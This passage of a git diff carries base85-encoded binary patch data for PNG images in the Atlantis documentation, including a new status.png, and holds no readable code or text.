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
Vv-O7ZgykOw(B6Jt_dLVT{tJD_=#&5e

literal 0
HcmV?d00001

diff --git a/runatlantis.io/docs/images/status.png b/runatlantis.io/docs/images/status.png
new file mode 100644
index 0000000000000000000000000000000000000000..88b5b88e65df67422f38b00b9a6d09558291484e
GIT binary patch
literal 45991
zcmeFY1zVh3wl0dh2PZf|5?q73yE}yw+}+)wa0m{;U4pv@hv4q+?wne^_ubun_U)|u
z18zNEQN{H64xe*WxPqKGG6FsV7#J9`q=bkP7#Iu&7#KJv91N&rT(!I%3=HX$xv;Q;
zq_8lFf`hH8xs?eRm_&F|3apB<B+lS|5(NcCy#UmYpfwSi>4JHQq|Xa*k|eo(XmFoh
zoD}_k=8y$oX`(AS(fQG`(`slyc>>TB73cZ`kdtiV!CKDL$6Y7V?tS*hGr8ZN*V;I3
z!4zWjBSj925y0?ztn7_*P#rD2AQEoiNCe=&fq4rUI@XG;p`(+6Ee*Y%-<?rLg}97q
zeLv2AeV<inZlgs3lYrWxu)(H+yg~=F6OWO|KnBZ2eTv>QjwJbzE0seZ0zpb3%_%xQ
zt|S-l7)DFUHI3sy28N)*uAKql7q5cD5}E*UO^qekfbIY-G$ae;{p!Vzb7eNP&CF~n
zti~Q{m35<=mDsr}gFp7mv?!{!4LgnI0lrq`@WlOnfBRuQIgTDLtrw2{GvFg8O@-#u
z%Csr0bQ;2A03!|U$6EZIV~9#xy<z!>_?*<u2h<E&z{4mQBv|6G$uqR@oWB*dWaK50
zDQbfTJN7_6eDlk}S9c#3>MTOe4B|1Y!q8x(eVVOn4RW3Ck*iqza7k>aYLZ^pFm||F
z&8c2ah8;M=UXm|@9ob3PSUfy;?)2*%R!;PiKU7$}_Hl=X@Jpas<gj5yhPRo-JN&TN
zPf&mDiNpRHG-TnlN`sLdDrqY(Atm={;^FsgCZdg{io%-<$BL}=CJWvEB6^74d#Uk(
zfmh*(BWNW#=>r>c13v*hyF1-i2^0Ak;6!9uWG#8#?vfoP9C$|;Dx*JC0|g_&4+ueR
zfHyJjAv~BB2@H)NY<VazIr)|`uaH|bMDvEc1P_pnYg~M81d?;|-DKuVr&ge`rfrOs
z2)-KxC*=G9uN?;ulwP}jU2mp+N}RpSZk%TLn+U%l8k65QCTSqm8!5vFJALTG>Tp5E
zwrhP=CFCCT)AcK~EHo~-SU3*2%ph(OY@QJN0AG~{x^(>+90V?dIls-L_>L+Rj^I*4
zJK`0>qtGRLm`ddG%kXLp+m#P<dtmMBSxcS2>G2e08%Xnan2Z@}A7kyMlBH1cjeh*}
zu2Qc2VqTB2K9xmmcKuq(PTvOmjvHRlhhjvxV17b27c>h=>4IU|rB$=7M5Id)Yhr0+
z+#r#b#hNP4h+(8`^xN|KF|>KH_d3$#oY?q!&s3WK<N9KryP+TgfBGS^t0hswr=2L`
z!TP$I;MQWN^AuY;TijY+LIa(ry%8R0KWT8MLa*zZO(Lfgc(5DSbuY21O{!{azwOhH
z;a|nidJAwMa==U;3ci8!Ho2ztMx6MO+d=Ae5zD}AlHm6Rrd@De3&N=I!qS3C3-VDz
zS$2ylz%&Hv>Z2~8qWF7ELdgYQZ!mv@<>=yVQuF9SoJ3vo7laa&fJ4qD*9zk^4A3BT
z31ivve;_B7pumWwAfpLGiz7h<nn;i;MJ1AQ$64&C@8CM%H-|ZqxB}^a;J8P72{9!`
zl;*b-({O=1i?vVbv*Ks^7v`jWqi^}B8=ahob--7T!W*q8W}B0FfanAUnMyX$g~Vt%
zig(@LQv*ed_rWN#8loJktjnTC?4hvAAX9_*4xMVtDI;9F_ZB~BaN{G-2S5<crpW_Q
z8w!6UpttqH=jDsP*d(b2x(+;TkBSh20Salhg3yBOSE;YCoh3v)++=Y>B;V09HyZKf
zWj>8lVWT%<prXm6bBC?=fn$XK5UnL^PUw-eQevmcu1~9vb&7XNnh}1=$tljM(l0{G
z0p^gX3@KA9E|l2`ZI<>Z2Mg9BEC!uOp-?&gx*oC|O4<>-!g4@$2j)pJ<u@tk(Uc?>
zBq~YK?S9<l+l|i4%gfD++`<&~-@@ou>JN;-!ED9kSDGzORskG2l?JtZ*AnFwZ5Q?y
z&YzMo*Q<xpVz*|i`0f&N2fPyuuVmE=FX&U%Dp#pgDRNRhEMV4L6j{`EFLbDM2){De
z{W9$R*%(V13xL%yOqS%3Wc0aF1xDqtw4rpf6t7gY)KitAluwzwB(3zZ%ziex>{N+6
ze@=GrK+Fli71|M{C&@2<u1HmyUQ#!sJc~GcU)ET1Z&_?EGZQwOTBcZOualqP&m@CK
zE5>Dnyp6U^x&0e=m1)h$%}6b}gwWA>)N`!nyWV%6F^Dn9?;NcB=1f0deooiVna^7C
zP7eH}`&smDVrs3>Tdvi%{7Iv+CZh)02sOIBEbvI<NaSdAezD+pDN9aS5kc{n>D6*i
zu}1mW-2H--(ni7aAiXL+-F0C=PN(4ek2l9cnBVDX<FqDOCU*n}xKMZ!NG|yGcu4r)
z@dj}B@Q4__^hKB)*rnK)^k=MQY|CvwTC{aF4LnrBFZL}4+1CF0(ZADPl4hQ9i16Fv
zx0&g8Q`$P6I{dolJyu8gYnf|=>tk#YM6*cN$O`P!<l=(BPwTZSR}okiyWc)lFImho
z#W0SWWZ3ESH)+qQSlS+cJjOq+yo|ae-M$`}kM-s3b`$Cea{i!2>GjjTTC%aEzS*qI
zlzWkVqG9UpXJ!H6VCBkL3-1_Tmrsp%;A>g9+6VU!jk0a00<Lh*8k>_R7yVPe6i+mc
z7mkfj5)bP850mR!9D^L=uAy-PB4bAkQz%nnD`P4bD?@eO9qL@99hZ;qtl}3b)_x32
zuAYUQS>0!zWfIB6io_BUWoE%-Sxq2Ji0g^z=~S)i$+y$BDYxIdciz-oqCbDUbw58o
zYMs1KB;Lb0P~Vu}tJ)*p2JF2vb}^EC%Aw5RpCq;O*(f0qQm~tB$<e0O#ST>+JIX#`
zb>G~n>z>&t-l*LWCru{Z0uCs!IyoFXO+Fh?8uU~@*`bXi0Epj6dT7a5wi;>rXwa31
zi+IB8qjk_0F+^j(WBuef(yf=j`F`NZw8s>mx~H+ba9A^2bH4qu6|v1#B$wJ^ceLwv
z>L%zV3_(N6Zs6L}#rkeeP;@KfnwrJ`x`$MU=V+#rQNqjOy?3cOT(?k%LWO~`jd4%u
zV;WlbWdTyM{0E)n>qo#i<v3y`jw@ti%KrG5JziNCd3rgY<gKh)zJiqVUksb~@Ltd+
z0qP}!CCkd|MZra?1;_=11;j%NLlUE3DOElc!cUCPrSrPFgbqn1G8~OMjjg0EGN53e
zj|<hB8nYRf^=6-_g*Wd|Nvg+)%ejw-a@IJaOsHml$ynx^a9AsKmv@A8@J)-I*dMjk
z)34S)45$oVLv*DV!u~{Op=VX^_PCYx$zS@8wt!Yv`^hs)R?mKI*~ESXKjoMnP}}xg
z)Rk><m2}nr*r?W2vCx45pwU=t81|XnQw1P4L8l;CBS<6g<Jd>gzgj&z9!?0CC8#%6
z*z43;)7e+posKzY9p7P=VeezRR-x(w8vUDd^?R42>)7>Z(==+mKbRyKE1Q{1nD?4)
zk6Ci~(r>4%Qs2|?SBsjBl+v9yIyCC7?)|KAX+68^In8!~b6Hu#YpSd4sn0XUu~#3j
zq)MtuqU-$nuGFsW>AHEwpxRS9&Ku`BuEwpZem=X{S_o4SH*<5A-cjY<x&9WSb-a`b
ziwlc@8W0#CIN>Y%a=VwiAv_kEi8@cj#96yb{rXLiP>G|evNH>?zKFIyX>WB^vnSR#
zklz{oUQzlhr{tw+;F67snkqRPmn+TFVI%QCW&JSm_v%>P_w&p&kG-cw8nfkb=<HTI
zzKxeO?DOOVoD~LEU8i=pllbd`r;(VHV=Y3h*tfHb=PCBVhL$gK>iA2#O9b4M&KXTd
z?zcB=otFDmb(Me)beH^X)6ucz#=`ZZwz2lt6S=2MbyvqTlr?RKY`e}4|KY&+P%hLj
zZ`BXm0!2pqm-L;LbK;7zXU>i-0G@G=mu9oa4@(L0MNjf&*^9iEN5}`(zI><d6Npoh
z-5oFds_!dT(=WSmoo#Oxr`b#E*HSMQ2hLLj6&$LzR2|ktVYqG&^xLZ&&jF}f#CKj!
zZwps6XTN`Ub7o6sOLuB`nZMw_+`cIcOajB`Oh<g685bsZjKTEO!382i-%(D%6bgS$
zm@*6R>`UVLzxQ2Tr;mOFFTR2xF@*;sy&yIru%ZN(T+qJ~#@;~`x4(WPXec-K<aVe3
z%(IEchlJcd1?@Kj*M)OAIk_>Ho6C@-a6$+sXEHnyq?C{)=qdwL@|=*q$bUr)tF;^R
zvGza$#SQRw5}J-+VA!AjdV@<UQCxsRiY#*#4JQp*87?DRYkC7?TSF6iH)}gkYcMb#
zH!jduYZE5}5;tor8%HiTUb26*-~xUBtC)d|<R49(EP2T^WEDt+Z5>QV*yvg58Oit%
zNJvO{9E?r5ltje-yF2JVUb1gaPIg=j46d%O^sX%Qwhm?tOq`sY42;YS%*=G47Icp8
zHckd^bT*FU|24?}GmeOfqmhHTos+q(4ar~Q8W`F-JMof{{Wa15y#8yQCT`~coXN)V
zzqbY2Aj4lZ3{3Ql4F5AWs4LH3rCbW;ZYEY5BIed6Hjbb<_?Xz(Sb6@@;eS>AbIO0|
zs`<~Z%pC0h+Vfv({<|j+!(Ti2mmU2VT>mHq;l+o*!|*@Y^C1{5Vcdhr@zGpFUIp|C
z@fU4CuL#ha`oBLx-_2|47N={$zy!b~MFdscz)v#aGonqN2YtznIE2MCN0g#^qG&~@
zB7JkChqW{jf`_pclWWC{kLiZvFY@9QR1lK#igAb4WK3xB`W8&%t~<{h#~sICGp;in
zO*!k{v+l25vi6(r&%Lwp9AD3#TZF6}{BhucV1M&ypuyz=^#y~gB>bTM{G32hQ`nLI
z?SKyy0;Jtk_>_O!P(fk?p9CD^&(DRVpHP52tIVHUfogMrU2Fmn6n}m;62O9?vcIMN
zxz%5_r2dwFhlfNL6*vMs-xMfj`!jG7enJrQe@6$PpF9L6hF6{e#NQAM2--sB-@!%#
zo(-bbgGevb-{4CE+JX+`-@qmS!3VD(aS<K@|F;b>F`8ih4h<+T5VbZwAb<GVh9HJR
z{#!o!{~7Lo^WXnRhQq_gh_9qD+O1)zKDfZ|)8#s=Bc*(xR4Dnzc~iWCayr~7vI!CF
zWi}d;NTH3Omi2@&vd!N=wew(g0G>|qM<%=w%@NA2b*n#VKfs+DR!>IioB#stcn&GD
zRygr%aAJ*{$jiZs)ykRIB7E?65yW@kKKd4A^!$dU+M4*0&zZ-60`*5h@MH5Qh*0S{
zo&|`AbWhLWF<-C?3kjtVhi;@ecADh4W8YFJFtlM~uQLC-c5dL|ciDhG>AVT`-fY)s
z#yP_5L@%iPoJQwukpE|vHia;I;|<ltLDBEoZ2s!~NPC1+70k&I#cqbsqudf4ge5+2
zH2TI7FbS=;DXH&O0sc+9GI;-(*86Q^$D_?-hfqhC@uRe*oKRXoL2bP^yVxI96p#yI
zP+2Z-<jtVz;#@SU^G$O_w^Z^7p^#Y}G?%z9euOSOtkNP<T|uzGYBl}?;FZRl2IHnJ
z^PWF8Fg%p$uBB+I@P<&ZDjO^Qj|vAWwoAN--OzAFhxM~P%UUrXvm2JQ>>)M=zVC17
zebLnoEH8*pm7hZ@#*(2sw^(P~o-1u6k_ASxS9#Kl(5JhiH6{O`9!a?2ik0E-&)w(F
zvfd(>Y+-*Qf`&e_vLKj=sb*&JUma6V2N+)}_omX{VK<7KROQ6=_nJEXi4wps@C*9F
z`KjV)Wbez^KUs^7a)4+m8Qo=3LP8fBwUmESb3?}<UAS|L*MLhL424MTCHhAi=>KJL
zJ|(xk#tR9pWdUMh{<n1fvm^l2ScuVlFTMpdLwvX)#~)#V1)YBYAt_1AS_Mc+%fjn;
z|G4V*zgE50EbTf$L-B)v5b;kG73d%b4Y@AM3HnPc#}z8`r!5|W%o}OuhJzy$0(`Uk
z-Gb{Mm!Spms3uXYv4hXb;Q2)go7RTP=VluI#cdDgqa;t<PZl6@g`&g|%z;(>KVkXb
zirs<6-;0WZ8r(n!BqAE64ZDffI82+f>w5<4j~XL4Z5JT4^-@J+{%A{ULj*c7FqV>R
z!}o0u4!MFi5HFiYa4wF{uWODLU;vs9x1OLKc|0w+|8Yl35RYOK-!xiKutj1yx_Nyc
z^D=n88vEjC=HW|W(wa&UUyOWNz<qB&)YWqX5e&yP&gf6>hkrRK&^9P&f?z@v+TPMw
z=cuoHtJgA0{MoGYv+iW0h1q;-J_bYX>z%&>73S5nC@Cq!80DbQpD2_jO#*;}*Zsn;
z?`m$GbK^RlBf7ZESa*jgrWUot@nxd<YaVdpyWZNLZ6g#3kRd2Y(^*gCI!ybNT8(%;
zEY8#HsXuT3T`_=xzr!eK{iT^MPDscmo#`&+Pt>c873e_2XkgVnLa07DXANLN&MNv#
zo-HYM!{rg+-3{?M;r<9Y2E?O~#3b^*{K?1g)Ay4*#CaA*mSCvPrs<3Y#=^+<(Ys<3
zbNZ1#VFJ<)n*V^sBWJfhOF{uWMceu`^JiWBuZqJSDM}6#&30XhYVhTJ8VU`FE$Kfl
zM-b{N7??B2BOx0Fg=MAL%%L=2n82U&eiqL8ZJ2p2$qEO<WjH(t4IRUcjC4EU7ykcd
z=zo@wB*5<=lIH3@Cgb8Pt_M48FjVOazuZ@vy$-OP7kk%LgLsoyy0UXZj&$>M`wQd!
zIqK!k&(o>amEPv8Pq2UVMcp(10)B?VXVMOaOj^ZxY=38cf73UV-=4QDolliJ7l0M|
z?sMCA?nTRGMO<uiJ(Hv>1R)y4^E2uz?tg~B-%E&O9S&YfL_@)r3?$Qg-<KRy7#8{=
zZiNa`Xf;+6@A_iUE1lGZh?;((kouDe5ovt=_y@;Spo0P=0#IzN$kOxv5xzNyFde44
znIZ~Q7*|_Kvwtn9ttsN`AC$EJix3F_9^OJJDXhBSaN6&ho7;tR?Zrs5%d445SPcOl
z6Ww7O!65rj>a|OjWF0ibK?&23FOA|A4R;|=qn7Fx1H@5G`)26frmzPORkq2baF>}w
znEx3XaEu}Jzg*|EkWZofAqc}6^Ofaj7+2|GIUN#%336Ml%G?)&{a-WW_#%JPz+bt;
zybl#Ub+$-_hHM@QZC>HUlx5zlMyU3jnjGcoY{H>qQ`7DIJSP|w{*S!foCy{j1je%9
zxG!P#Z072x)BJ_AE;#6gjI5Yp!WQSPZ*Y*^p!XNC-NSSZ5?xSf|L3i7W@LNc$GxVS
zhg(c6W|4&8Kj0D|3Nle(@!}uk1)%lhhJ@*3n3W}lP|1Y6uFSn0UcNlPqlN*2c<RXL
z7-tOgAMcY}KbRouX5z_K%l!!@2`o_LP|{WZI?8a+Y!r0DKS7{w3J>qDD<aVrA2mD3
zuD=N&CZ)eTr`1GCiqMH1tn$T0O|}i61O{kMQxcH=$$10;0+kt(?P(%F)NGra{jr&f
zh9xMdjh-x{-HT}Zexloqirs8Pq_LxrMr`gR@FL(-ZGktt)PF>n0_Y2hUnF{0VlhYs
z;Sri&jfJX%gW71xiksiwvNLg;%_!x<r1MYOD$#Mol`T<4ogQS7er05S=x+Frz>;L6
zgKWb9yt+^T2Bt$@Dw+&PuSdecJ0KWL`!_#4oL5aZNilP@Mr1O+4Cuja9|ny=k1hSj
z;ryWf3a@_{ky=H)>-7cAe*(LHbV>~I=5Uu}f|#dO#6p%@x2iIFZ`J@=UiFLwE*9+{
